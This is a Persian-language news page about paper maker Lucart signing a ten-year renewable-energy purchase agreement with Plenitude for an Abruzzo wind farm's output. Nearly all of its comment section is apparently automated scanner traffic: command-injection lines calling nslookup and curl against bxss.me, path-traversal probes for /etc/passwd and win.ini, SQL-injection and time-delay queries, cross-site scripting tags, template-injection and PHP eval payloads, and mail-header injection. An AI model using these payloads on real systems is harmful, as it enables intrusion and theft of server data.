محصولات
  Filters
  Preferences
  جستجو

  شرکت لوکارت

  یکشنبه, 07 اسفند,1401

  شرکت تولید دستمال کاغذی لوکارت Lucart، یک قرارداد 10 ساله با شرکت Plenitude برای خرید انرژی های تجدیدپذیر امضا کرده است.
  گروه کاغذسازی قرارداد خرید برق شرکتی (PPA شرکتی) 10 ساله را با شرکت گروه Eni امضا کرده است که تولید انرژی را به طور کامل از منابع تجدیدپذیر، فروش خدمات انرژی و شبکه گسترده ای از نقاط شارژ برق را یکپارچه می کند.

  شرایط قرارداد

  از 1 ژانویه 2023، توافقنامه با Plenitude کل تولید مزرعه بادی 10 مگاواتی در آبروزو را پوشش می دهد. حدود 18 گیگاوات ساعت در سال، برای پوشش بخشی قابل توجهی از نیازهای کارخانه های لوکارت در ایتالیا استفاده خواهد شد. این گروه قادر خواهد بود انتشار CO2 مربوط به خرید برق از شبکه سراسری را حدود 30 درصد کاهش دهد.

  ماسیمو پاسکوینی، مدیرعامل گروه لوکارت گفت: «این توافق کاملاً با برنامه‌های میان‌مدت انتقال انرژی ما مطابقت دارد». "این به ما امکان می دهد تا ردپای کربن عملیات خود را کاهش دهیم و هزینه های انرژی خود را در زمان عدم اطمینان به دلیل اثرات رویدادهای ژئوپلیتیکی بر بازار انرژی تثبیت کنیم."

  این عملیات بخشی از یک طرح کربن زدایی گسترده‌تر است که توسط لوکارت تهیه شده است، که شامل نصب نیروگاه‌های تولید خورشیدی در کارخانه‌های خود در اروپا، مانند دیسیموDiecimo، نصب نیروگاه‌های زیست توده برای تولید انرژی الکتریکی و حرارتی، و کاهش مصرف برق توسط نوسازی فن آوری سیستم های تولید آن.

  نظرات
  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  1BESf006npO

  1Yg2FQ7LcO
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  response.write(9143101*9837410)

  Mr.
  1402/04/28 18:39

  echo hpaaaq$()\ ecoxqp\nz^xyu||a #' &echo hpaaaq$()\ ecoxqp\nz^xyu||a #|" &echo hpaaaq$()\ ecoxqp\nz^xyu||a #

  Mr.
  1402/04/28 18:39

  '+response.write(9143101*9837410)+'

  Mr.
  1402/04/28 18:39

  "+response.write(9143101*9837410)+"

  Mr.
  1402/04/28 18:39

  &echo oimxec$()\ zlefis\nz^xyu||a #' &echo oimxec$()\ zlefis\nz^xyu||a #|" &echo oimxec$()\ zlefis\nz^xyu||a #

  response.write(9509306*9641937)
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  |echo ymnyjc$()\ wltwlf\nz^xyu||a #' |echo ymnyjc$()\ wltwlf\nz^xyu||a #|" |echo ymnyjc$()\ wltwlf\nz^xyu||a #

  '+response.write(9509306*9641937)+'
  1402/04/28 18:39

  555

  "+response.write(9509306*9641937)+"
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  dZHoAP8M

  Mr.
  1402/04/28 18:39

  (nslookup -q=cname hitgjbnxsiklwc6fdd.bxss.me||curl hitgjbnxsiklwc6fdd.bxss.me))

  UnU0EZW5
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  $(nslookup -q=cname hittunvgmlqopfc954.bxss.me||curl hittunvgmlqopfc954.bxss.me)

  Mr.
  1402/04/28 18:39

  &nslookup -q=cname hitnoibyucowpa76d7.bxss.me&'\"`0&nslookup -q=cname hitnoibyucowpa76d7.bxss.me&`'

  Mr.
  1402/04/28 18:39

  &(nslookup -q=cname hitwwufjetzay156fc.bxss.me||curl hitwwufjetzay156fc.bxss.me)&'\"`0&(nslookup -q=cname hitwwufjetzay156fc.bxss.me||curl hitwwufjetzay156fc.bxss.me)&`'

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  |(nslookup -q=cname hitrmchhzcrocc34d1.bxss.me||curl hitrmchhzcrocc34d1.bxss.me)

  Mr.
  1402/04/28 18:39

  ../../../../../../../../../../../../../../etc/passwd

  Mr.
  1402/04/28 18:39

  `(nslookup -q=cname hitldtofbvqbr6cc7d.bxss.me||curl hitldtofbvqbr6cc7d.bxss.me)`

  Mr.
  1402/04/28 18:39

  ../../../../../../../../../../../../../../windows/win.ini

  Mr.
  1402/04/28 18:39

  ;(nslookup -q=cname hitkmprmnvpaycbebc.bxss.me||curl hitkmprmnvpaycbebc.bxss.me)|(nslookup -q=cname hitkmprmnvpaycbebc.bxss.me||curl hitkmprmnvpaycbebc.bxss.me)&(nslookup -q=cname hitkmprmnvpaycbebc.bxss.me||curl hitkmprmnvpaycbebc.bxss.me)

  echo ncpbph$()\ nnfvbs\nz^xyu||a #' &echo ncpbph$()\ nnfvbs\nz^xyu||a #|" &echo ncpbph$()\ nnfvbs\nz^xyu||a #
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  file:///etc/passwd

  Mr.
  1402/04/28 18:39

  555

  &echo pdszrg$()\ qosqcu\nz^xyu||a #' &echo pdszrg$()\ qosqcu\nz^xyu||a #|" &echo pdszrg$()\ qosqcu\nz^xyu||a #
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  ../555

  ../../../../../../../../../../../../../../etc/passwd
  1402/04/28 18:39

  555

  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/28 18:39

  555

  |echo bbifif$()\ zepktr\nz^xyu||a #' |echo bbifif$()\ zepktr\nz^xyu||a #|" |echo bbifif$()\ zepktr\nz^xyu||a #
  1402/04/28 18:39

  555

  (nslookup -q=cname hitldiwafctei8ee27.bxss.me||curl hitldiwafctei8ee27.bxss.me))
  1402/04/28 18:39

  555

  file:///etc/passwd
  1402/04/28 18:39

  555

  $(nslookup -q=cname hitosemawzvpoc9bab.bxss.me||curl hitosemawzvpoc9bab.bxss.me)
  1402/04/28 18:39

  555

  &nslookup -q=cname hityolulmummm2d2f6.bxss.me&'\"`0&nslookup -q=cname hityolulmummm2d2f6.bxss.me&`'
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  &(nslookup -q=cname hitrwjlzeefij953e7.bxss.me||curl hitrwjlzeefij953e7.bxss.me)&'\"`0&(nslookup -q=cname hitrwjlzeefij953e7.bxss.me||curl hitrwjlzeefij953e7.bxss.me)&`'
  1402/04/28 18:39

  555

  ../Mr.
  1402/04/28 18:39

  555

  |(nslookup -q=cname hitdyvvmexwnt52511.bxss.me||curl hitdyvvmexwnt52511.bxss.me)
  1402/04/28 18:39

  555

  `(nslookup -q=cname hitocgmghviyee0331.bxss.me||curl hitocgmghviyee0331.bxss.me)`
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555
  bcc:074625.447-174471.447.64d00.19557.2@bxss.me

  Mr.
  1402/04/28 18:39

  to@example.com>
  bcc:074625.447-174472.447.64d00.19557.2@bxss.me

  Mr.
  1402/04/28 18:39

  555

  Mr. bcc:074625.447-174473.447.64d00.19557.2@bxss.me
  1402/04/28 18:39

  555

  to@example.com> bcc:074625.447-174474.447.64d00.19557.2@bxss.me
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  12345'"\'\");|]*{
  <>%BF''💡

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555<esi:include src="http://bxss.me/rpb.png"/>

  Mr.
  1402/04/28 18:39

  555

  12345'"\'\");|]*�{ <�>%BF''💡
  1402/04/28 18:39

  555

  Mr.<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  -1 OR 2+709-709-1=0+0+0+1 --

  Mr.
  1402/04/28 18:39

  -1 OR 2+210-210-1=0+0+0+1

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  -1' OR 2+786-786-1=0+0+0+1 --

  Mr.
  1402/04/28 18:39

  -1' OR 2+495-495-1=0+0+0+1 or 'zNGL4FEs'='

  Mr.
  1402/04/28 18:39

  ${9999222+9999217}

  Mr.
  1402/04/28 18:39

  -1" OR 2+861-861-1=0+0+0+1 --

  ${9999112+10000135}
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

  Mr.
  1402/04/28 18:39

  555&n939419=v953322

  Mr.
  1402/04/28 18:39

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

  Mr.
  1402/04/28 18:39

  Http://bxss.me/t/fit.txt

  Mr.
  1402/04/28 18:39

  http://bxss.me/t/fit.txt?.jpg

  Mr.
  1402/04/28 18:39

  /etc/shells

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  c:/windows/win.ini

  Mr.
  1402/04/28 18:39

  bxss.me

  Mr.
  1402/04/28 18:39

  )

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  !(()&&!|*|*|

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.
  1402/04/28 18:39

  555

  Mr.&n944749=v915123
  1402/04/28 18:39

  555

  Http://bxss.me/t/fit.txt
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  ^(#$!@#$)(()))******

  )
  1402/04/28 18:39

  555

  http://bxss.me/t/fit.txt?.
  1402/04/28 18:39

  555

  /etc/shells
  1402/04/28 18:39

  555

  !(()&&!|*|*|
  1402/04/28 18:39

  555

  c:/windows/win.ini
  1402/04/28 18:39

  555

  ^(#$!@#$)(()))******
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  bxss.me
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  '.gethostbyname(lc('hitsk'.'wsczgxrld45ab.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(78).chr(105).chr(84).'

  Mr.
  1402/04/28 18:39

  '"()

  Mr.
  1402/04/28 18:39

  ".gethostbyname(lc("hitok"."abahcifb1a143.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(84).chr(99).chr(74)."

  '.gethostbyname(lc('hitkv'.'slbwhrqp02b72.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(67).chr(122).chr(84).'
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555'&&sleep(27*1000)*kmzfhp&&'

  ".gethostbyname(lc("hiten"."nqmwkqhl40a95.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(84).chr(98).chr(82)."
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555"&&sleep(27*1000)*qcmezh&&"

  Mr.
  1402/04/28 18:39

  555'||sleep(27*1000)*zalkpk||'

  Mr.
  1402/04/28 18:39

  HttP://bxss.me/t/xss.html?%00

  Mr.
  1402/04/28 18:39

  if(now()=sysdate(),sleep(15),0)

  Mr.
  1402/04/28 18:39

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  Mr.
  1402/04/28 18:39

  555"||sleep(27*1000)*rcyyzv||"

  Mr.
  1402/04/28 18:39

  bxss.me/t/xss.html?%00

  Mr.
  1402/04/28 18:39

  ';print(md5(31337));$a='

  HttP://bxss.me/t/xss.html?%00
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  ";print(md5(31337));$a="

  bxss.me/t/xss.html?%00
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  ${@print(md5(31337))}

  Mr.
  1402/04/28 18:39

  ${@print(md5(31337))}\

  Mr.
  1402/04/28 18:39

  '.print(md5(31337)).'

  Mr.
  1402/04/28 18:39

  555

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/28 18:39

  555

  ';print(md5(31337));$a='
  1402/04/28 18:39

  555

  ";print(md5(31337));$a="
  1402/04/28 18:39

  555

  ${@print(md5(31337))}
  1402/04/28 18:39

  555

  ${@print(md5(31337))}\
  1402/04/28 18:39

  555

  '.print(md5(31337)).'
  1402/04/28 18:39

  555

  '"()
  1402/04/28 18:39

  555

  Mr.'&&sleep(27*1000)*fwmsia&&'
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  "+"A".concat(70-3).concat(22*4).concat(112).concat(75).concat(107).concat(73)+(require"socket"
  Socket.gethostbyname("hitpx"+"otvzstzj5cd0e.bxss.me.")[3].to_s)+"

  Mr."&&sleep(27*1000)*zhnbwe&&"
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  '+'A'.concat(70-3).concat(22*4).concat(115).concat(78).concat(100).concat(66)+(require'socket'
  Socket.gethostbyname('hitnf'+'tzpmnaeub2292.bxss.me.')[3].to_s)+'

  Mr.'||sleep(27*1000)*rfrswy||'
  1402/04/28 18:39

  555

  "+"A".concat(70-3).concat(22*4).concat(122).concat(77).concat(120).concat(69)+(require"socket" Socket.gethostbyname("hitec"+"nzyxcgsb30d11.bxss.me.")[3].to_s)+"
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr."||sleep(27*1000)*roycyt||"
  1402/04/28 18:39

  555

  '+'A'.concat(70-3).concat(22*4).concat(98).concat(66).concat(100).concat(65)+(require'socket' Socket.gethostbyname('hitet'+'qziizbqo1d714.bxss.me.')[3].to_s)+'
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/28 18:39

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA�
  1402/04/28 18:39

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  Mr.
  1402/04/28 18:39

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  xfs.bxss.me

  xfs.bxss.me
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  '"

  Mr.
  1402/04/28 18:39

  <!--

  '"
  1402/04/28 18:39

  555

  <!--
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555'"()&%<zzz><ScRiPt >A35Q(9054)</ScRiPt>

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  '"()&%<zzz><ScRiPt >A35Q(9034)</ScRiPt>

  Mr.
  1402/04/28 18:39

  555

  Mr.
  1402/04/28 18:39

  5559234982

  Mr.
  1402/04/28 18:39

  bfg1473<s1﹥s2ʺs3ʹhjl1473

  Mr.
  1402/04/28 18:39

  bfgx7948%C0%BEz1%C0%BCz2a%90bcxhjl7948

  Mr.
  1402/04/28 18:39

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  Mr.
  1402/04/28 18:39

  <%={{={@{#{${dfb}}%>

  Mr.
  1402/04/28 18:39

  <th:t="${dfb}#foreach

  Mr.
  1402/04/28 18:39

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  Mr.
  1402/04/28 18:39

  dfb{{98991*97996}}xca

  Mr.
  1402/04/28 18:39

  dfb[[${98991*97996}]]xca

  Mr.
  1402/04/28 18:39

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/28 18:39

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.
  1402/04/28 18:39

  555<ScRiPt >A35Q(9160)</ScRiPt>

  Mr.
  1402/04/28 18:39

  555<W8NYDN>UO2J0[!+!]</W8NYDN>

  Mr.
  1402/04/28 18:39

  555<script>A35Q(9519)</script>

  Mr.
  1402/04/28 18:39

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  Mr.
  1402/04/28 18:39

  555<ScR<ScRiPt>IpT>A35Q(9118)</sCr<ScRiPt>IpT>

  Mr.
  1402/04/28 18:39

  555<ScRiPt
  >A35Q(9258)</ScRiPt>

  Mr.
  1402/04/28 18:39

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9527></ScRiPt>

  Mr.
  1402/04/28 18:39

  555<ScRiPt
  >A35Q(9576)</ScRiPt>

  Mr.
  1402/04/28 18:39

  555<svg  

  %A0onload=A35Q(9657);>

  Mr.
  1402/04/28 18:39

  555<isindex type=image src=1 onerror=A35Q(9964)>

  Mr.
  1402/04/28 18:40

  -1; waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:40

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9503'>

  Mr.
  1402/04/28 18:40

  555<body onload=A35Q(9363)>

  Mr.
  1402/04/28 18:40

  555<img src=//xss.bxss.me/t/dot.gif onload=A35Q(9616)>

  Mr.
  1402/04/28 18:40

  555<img src=xyz OnErRor=A35Q(9792)>

  Mr.
  1402/04/28 18:40

  555<img/src=">" onerror=alert(9522)>

  Mr.
  1402/04/28 18:40

  %35%35%35%3C%53%63%52%69%50%74%20%3E%41%33%35%51%289661%29%3C%2F%73%43%72%69%70%54%3E

  Mr.
  1402/04/28 18:40

  -1); waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:40

  555\u003CScRiPt\A35Q(9930)\u003C/sCripT\u003E

  Mr.
  1402/04/28 18:40

  555&lt;ScRiPt&gt;A35Q(9059)&lt;/sCripT&gt;

  Mr.
  1402/04/28 18:40

  %F6<img zzz onmouseover=A35Q(96391) //%F6>

  Mr.
  1402/04/28 18:40

  555<input autofocus onfocus=A35Q(9699)>

  Mr.
  1402/04/28 18:40

  <a HrEF=http://xss.bxss.me></a>

  Mr.
  1402/04/28 18:40

  1 waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:40

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555}body{zzz:Expre/**/SSion(A35Q(9772))}

  Mr.
  1402/04/28 18:40

  555f4zTU
  <ScRiPt >A35Q(9260)</ScRiPt>

  Mr.
  1402/04/28 18:40

  555<WOKV5M>RNMEE[!+!]</WOKV5M>

  Mr.
  1402/04/28 18:40

  555<ifRAme sRc=9355.com></IfRamE>

  Mr.
  1402/04/28 18:40

  555'"()&%<zzz><ScRiPt >9wCf(9287)</ScRiPt>

  Mr.'"()&%<zzz><ScRiPt >0dxY(9898)</ScRiPt>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555<ardxrcN x=9942>

  Mr.
  1402/04/28 18:40

  '"()&%<zzz><ScRiPt >9wCf(9092)</ScRiPt>

  Mr.
  1402/04/28 18:40

  bAxFULZ9'; waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:40

  555

  '"()&%<zzz><ScRiPt >0dxY(9393)</ScRiPt>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555<img sRc='http://attacker-9728/log.php?

  Mr.
  1402/04/28 18:40

  5559633799

  Mr.
  1402/04/28 18:40

  555<aWIogCe<

  Mr.
  1402/04/28 18:40

  555

  Mr.9156446
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.'"()&%<zzz><ScRiPt >A35Q(9041)</ScRiPt>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  echo yznjkj$()\ kqdgod\nz^xyu||a #' &echo yznjkj$()\ kqdgod\nz^xyu||a #|" &echo yznjkj$()\ kqdgod\nz^xyu||a #

  Mr.
  1402/04/28 18:40

  response.write(9294017*9297926)

  '"()&%<zzz><ScRiPt >A35Q(9741)</ScRiPt>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  &echo qhagit$()\ sjohyg\nz^xyu||a #' &echo qhagit$()\ sjohyg\nz^xyu||a #|" &echo qhagit$()\ sjohyg\nz^xyu||a #

  Mr.
  1402/04/28 18:40

  '+response.write(9294017*9297926)+'

  Mr.
  1402/04/28 18:40

  |echo vfxhxi$()\ tnrdri\nz^xyu||a #' |echo vfxhxi$()\ tnrdri\nz^xyu||a #|" |echo vfxhxi$()\ tnrdri\nz^xyu||a #

  Mr.
  1402/04/28 18:40

  "+response.write(9294017*9297926)+"

  Mr.
  1402/04/28 18:40

  (nslookup -q=cname hitwmnphjlnmn418de.bxss.me||curl hitwmnphjlnmn418de.bxss.me))

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  $(nslookup -q=cname hitljihuywmbpb6c71.bxss.me||curl hitljihuywmbpb6c71.bxss.me)

  response.write(9238472*9966249)
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  &nslookup -q=cname hitshbheedxpxc4355.bxss.me&'\"`0&nslookup -q=cname hitshbheedxpxc4355.bxss.me&`'

  '+response.write(9238472*9966249)+'
  1402/04/28 18:40

  555

  Mr.9497121
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  &(nslookup -q=cname hitvbvoiraysob8276.bxss.me||curl hitvbvoiraysob8276.bxss.me)&'\"`0&(nslookup -q=cname hitvbvoiraysob8276.bxss.me||curl hitvbvoiraysob8276.bxss.me)&`'

  "+response.write(9238472*9966249)+"
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  |(nslookup -q=cname hitmnuyuuzqqg8b7b7.bxss.me||curl hitmnuyuuzqqg8b7b7.bxss.me)

  Mr.
  1402/04/28 18:40

  `(nslookup -q=cname hitpijietiadi828e7.bxss.me||curl hitpijietiadi828e7.bxss.me)`

  Mr.
  1402/04/28 18:40

  ;(nslookup -q=cname hityqjzdkqnvsf6bc6.bxss.me||curl hityqjzdkqnvsf6bc6.bxss.me)|(nslookup -q=cname hityqjzdkqnvsf6bc6.bxss.me||curl hityqjzdkqnvsf6bc6.bxss.me)&(nslookup -q=cname hityqjzdkqnvsf6bc6.bxss.me||curl hityqjzdkqnvsf6bc6.bxss.me)

  echo eqvvrg$()\ forlvq\nz^xyu||a #' &echo eqvvrg$()\ forlvq\nz^xyu||a #|" &echo eqvvrg$()\ forlvq\nz^xyu||a #
  1402/04/28 18:40

  555

  bfg10367<s1﹥s2ʺs3ʹhjl10367
  1402/04/28 18:40

  555

  &echo guydzy$()\ uwghmx\nz^xyu||a #' &echo guydzy$()\ uwghmx\nz^xyu||a #|" &echo guydzy$()\ uwghmx\nz^xyu||a #
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  -5 OR 402=(SELECT 402 FROM PG_SLEEP(15))--

  |echo abguoe$()\ wnjnnv\nz^xyu||a #' |echo abguoe$()\ wnjnnv\nz^xyu||a #|" |echo abguoe$()\ wnjnnv\nz^xyu||a #
  1402/04/28 18:40

  555

  (nslookup -q=cname hitpacfmgymayac6ed.bxss.me||curl hitpacfmgymayac6ed.bxss.me))
  1402/04/28 18:40

  555

  $(nslookup -q=cname hitvytzlwfbjb3b5c6.bxss.me||curl hitvytzlwfbjb3b5c6.bxss.me)
  1402/04/28 18:40

  555

  &nslookup -q=cname hitzlohfihosq1e67f.bxss.me&'\"`0&nslookup -q=cname hitzlohfihosq1e67f.bxss.me&`'
  1402/04/28 18:40

  555

  &(nslookup -q=cname hitxzmnlqqpvl2e6aa.bxss.me||curl hitxzmnlqqpvl2e6aa.bxss.me)&'\"`0&(nslookup -q=cname hitxzmnlqqpvl2e6aa.bxss.me||curl hitxzmnlqqpvl2e6aa.bxss.me)&`'
  1402/04/28 18:40

  555

  |(nslookup -q=cname hitzdstgbjwfe7a36b.bxss.me||curl hitzdstgbjwfe7a36b.bxss.me)
  1402/04/28 18:40

  555

  bfgx2097%C0%BEz1%C0%BCz2a%90bcxhjl2097
  1402/04/28 18:40

  555

  `(nslookup -q=cname hitmdienkmgyxcab84.bxss.me||curl hitmdienkmgyxcab84.bxss.me)`
  1402/04/28 18:40

  555

  <%={{={@{#{${dfb}}%>
  1402/04/28 18:40

  555

  <th:t="${dfb}#foreach
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  8BkoSv0J

  8lJdjjgw
  1402/04/28 18:40

  555

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  -1 OR 2+328-328-1=0+0+0+1 --

  Mr.
  1402/04/28 18:40

  ../../../../../../../../../../../../../../etc/passwd

  Mr.
  1402/04/28 18:40

  -1 OR 2+996-996-1=0+0+0+1

  Mr.
  1402/04/28 18:40

  -1' OR 2+334-334-1=0+0+0+1 --

  Mr.
  1402/04/28 18:40

  ../../../../../../../../../../../../../../windows/win.ini

  dfb{{98991*97996}}xca
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  file:///etc/passwd

  Mr.
  1402/04/28 18:40

  -1' OR 2+746-746-1=0+0+0+1 or 'R7rSsUxi'='

  Mr.
  1402/04/28 18:40

  -1" OR 2+870-870-1=0+0+0+1 --

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  ../555

  ../../../../../../../../../../../../../../etc/passwd
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  -5) OR 92=(SELECT 92 FROM PG_SLEEP(15))--

  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/28 18:40

  555

  file:///etc/passwd
  1402/04/28 18:40

  555

  dfb[[${98991*97996}]]xca
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  ../Mr.
  1402/04/28 18:40

  555

  dfb__${98991*97996}__::.x
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555
  bcc:074625.447-175149.447.64d00.19557.2@bxss.me

  Mr.
  1402/04/28 18:40

  to@example.com>
  bcc:074625.447-175150.447.64d00.19557.2@bxss.me

  Mr. bcc:074625.447-175151.447.64d00.19557.2@bxss.me
  1402/04/28 18:40

  555

  to@example.com> bcc:074625.447-175152.447.64d00.19557.2@bxss.me
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/28 18:40

  555

  Mr.<ScRiPt >A35Q(9536)</ScRiPt>
  1402/04/28 18:40

  555

  Mr.<WZPCNR>6V5W0[!+!]</WZPCNR>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  if(now()=sysdate(),sleep(15),0)

  Mr.
  1402/04/28 18:40

  -1)) OR 860=(SELECT 860 FROM PG_SLEEP(15))--

  Mr.<script>A35Q(9645)</script>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  12345'"\'\");|]*{
  <>%BF''💡

  Mr.
  1402/04/28 18:40

  555

  Mr.<ScR<ScRiPt>IpT>A35Q(9128)</sCr<ScRiPt>IpT>
  1402/04/28 18:40

  555

  Mr.<ScRiPt >A35Q(9007)</ScRiPt>
  1402/04/28 18:40

  555

  12345'"\'\");|]*�{ <�>%BF''💡
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555<esi:include src="http://bxss.me/rpb.png"/>

  Mr.<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/28 18:40

  555

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9663></ScRiPt>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  ${10000181+10000124}

  ${9999216+9999563}
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

  Mr.
  1402/04/28 18:40

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

  Mr.
  1402/04/28 18:40

  Http://bxss.me/t/fit.txt

  Mr.<�ScRiPt >A35Q(9370)</ScRiPt>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  http://bxss.me/t/fit.txt?.jpg

  Mr.
  1402/04/28 18:40

  /etc/shells

  Mr.
  1402/04/28 18:40

  c:/windows/win.ini

  Mr.
  1402/04/28 18:40

  555&n967802=v996836

  Mr.
  1402/04/28 18:40

  bxss.me

  Mr.
  1402/04/28 18:40

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  Mr.<svg %A0�onload=A35Q(9838);>
  1402/04/28 18:40

  555

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.
  1402/04/28 18:40

  555

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

